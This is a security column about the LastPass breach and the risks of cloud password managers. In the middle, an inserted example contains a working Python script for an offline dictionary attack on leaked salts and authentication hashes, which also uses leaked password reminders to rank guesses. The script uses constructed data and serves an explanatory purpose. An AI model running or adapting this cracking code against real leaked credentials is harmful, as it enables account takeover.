A week or two ago, a Facebook friend of mine posted how much he loved the cloud-based password manager that he uses and how safe it is. Many others chimed in with similar comments. You just know I’m going to pop up and warn that there are still plenty of security risks with these password manager sites, and there have been incidents where they’ve been breached. I was surprised at the number of people who took me to task and asked me to “prove it.”
I claim no psychic powers, but before I had the chance to go back and find information on past breaches, I began to get emails alerting me that LastPass had been breached. I honestly thought it was such an odd coincidence that my mind was playing tricks on me, and I had to go check again to make sure that my email wasn’t somehow regurgitating three-year-old messages.
Nope. LastPass has been breached. Again. For at least the third time now since 2011. At what point is something an anomaly and at what point is it a trend?
According to eSecurity Planet, here is a brief overview of what exactly happened:
While no LastPass user accounts were accessed and no encrypted user data (stored passwords) was stolen, the company's investigation has determined that LastPass account email addresses, password reminders, server per user salts and authentication hashes were compromised.
I get why people turn to password managers like LastPass. Passwords are cumbersome and frustrating and just so hard to remember, but until we settle on a replacement for passwords, we’re stuck with them. On the surface, a password manager lets us remember only one master password while using dozens of unique, per-site passwords, as security guidance recommends.
But it is time to stop thinking of password managers as an inherently secure place to store those passwords because, like everything else, they are a target for theft. As Devin Egan, co-founder and CTO of LaunchKey, told me in an email:
Password vaults in the cloud are potentially dangerous, as a breach like this could expose every password to every site for a wide range of users. Unlike a site that stores passwords one-way hashed, a password manager encrypts the users' passwords with a way to decrypt them so they can be used later. Thus, LastPass's breached hashes and salts will be under attack, and any successful crack could leave a specific user, without additional factors of authentication, open to further data breaches.
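To make Egan's point concrete, here is an added example (not code from LastPass, from the article, or from anyone quoted in it) that reconstructs the attacker's position after a leak of the kind eSecurity Planet describes: email addresses, password reminders, per-user salts and authentication hashes, but no vault contents. It assumes the authentication hash is PBKDF2-HMAC-SHA256 of the master password with the per-user salt at 100,000 iterations; that construction, the two user records, the salts, the reminders and the wordlist are all assumptions constructed for illustration, not a description of how LastPass actually derives or stores anything.

```python
"""Offline dictionary attack against leaked (salt, authentication hash) pairs.

Added example, not code from LastPass or from the article. The hash
construction (PBKDF2-HMAC-SHA256 of the master password with the per-user
salt) and every record, salt, reminder and wordlist entry below are
assumptions constructed for illustration.
"""
import hashlib
import hmac

ITERATIONS = 100_000  # assumed server-side work factor, not LastPass's real value


def auth_hash(master_password: str, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    """Derive the authentication hash the server would store (assumed PBKDF2)."""
    return hashlib.pbkdf2_hmac("sha256", master_password.encode("utf-8"),
                               salt, iterations, dklen=32)


def leaked_record(email: str, reminder: str, master_password: str,
                  salt: bytes, iterations: int = ITERATIONS) -> dict:
    """Build what an attacker holds after a breach of this kind: email,
    password reminder, per-user salt and authentication hash. The master
    password is used only to construct the sample; the attacker lacks it."""
    return {"email": email, "reminder": reminder, "salt": salt,
            "iterations": iterations,
            "hash": auth_hash(master_password, salt, iterations)}


def prioritize(wordlist: list, reminder: str) -> list:
    """Leaked reminders narrow the search: candidates that share a token
    with the reminder are tried first, then the rest of the list."""
    tokens = {t.lower() for t in reminder.replace("+", " ").split()}
    hits = [w for w in wordlist if any(t in w.lower() for t in tokens)]
    hit_set = set(hits)
    return hits + [w for w in wordlist if w not in hit_set]


def crack(record: dict, wordlist: list):
    """Recompute the hash for each candidate with the victim's own salt and
    work factor; return the master password on a match, else None."""
    for candidate in prioritize(wordlist, record["reminder"]):
        guess = auth_hash(candidate, record["salt"], record["iterations"])
        if hmac.compare_digest(guess, record["hash"]):
            return candidate
    return None


# Constructed samples with fixed salts so a run is reproducible.
SALT_A = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")
SALT_B = bytes.fromhex("00112233445566778899aabbccddeeff")
WEAK = leaked_record("alice@example.com", "summer + year", "Summer2015!", SALT_A)
STRONG = leaked_record("bob@example.com", "diceware",
                       "correct-battery-granite-orbit-9", SALT_B)

# Constructed attacker wordlist; a real one would be millions of entries.
WORDLIST = ["password", "123456", "qwerty", "letmein", "Welcome1",
            "Spring2015!", "Summer2015!", "Autumn2015!", "P@ssw0rd", "lastpass"]

if __name__ == "__main__":
    print("weak  :", crack(WEAK, WORDLIST))    # cracked on the first guess
    print("strong:", crack(STRONG, WORDLIST))  # None: not in the wordlist
```

Three things the run shows. The per-user salt means the same master password hashes differently for every user, so the attacker cannot reuse work across accounts or use precomputed tables; the iteration count multiplies the cost of every guess; but neither protects a master password that appears in a wordlist, and the leaked reminder tells the attacker which part of the wordlist to try first. A second factor is what keeps a recovered master password from being immediately usable against the account.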
Unfortunately, password managers lull users into a false sense of security, Ken Westin, senior security analyst at Tripwire, told me. You still need a password to log in, and that master password can be stolen just as easily as any other password.
LastPass advises its customers to use multi-factor authentication to access the site, and that’s a good idea, especially since LastPass’s security problems are leaning toward being a trend. We simply have to recognize that we can’t count on anyone being as secure as we’d like. Not even the sites whose primary purpose is security.
Sue Marquette Poremba has been writing about network security since 2008. In addition to her coverage of security issues for IT Business Edge, her security articles have been published at various sites such as Forbes, Midsize Insider and Tom's Guide. You can reach Sue via Twitter: @sueporemba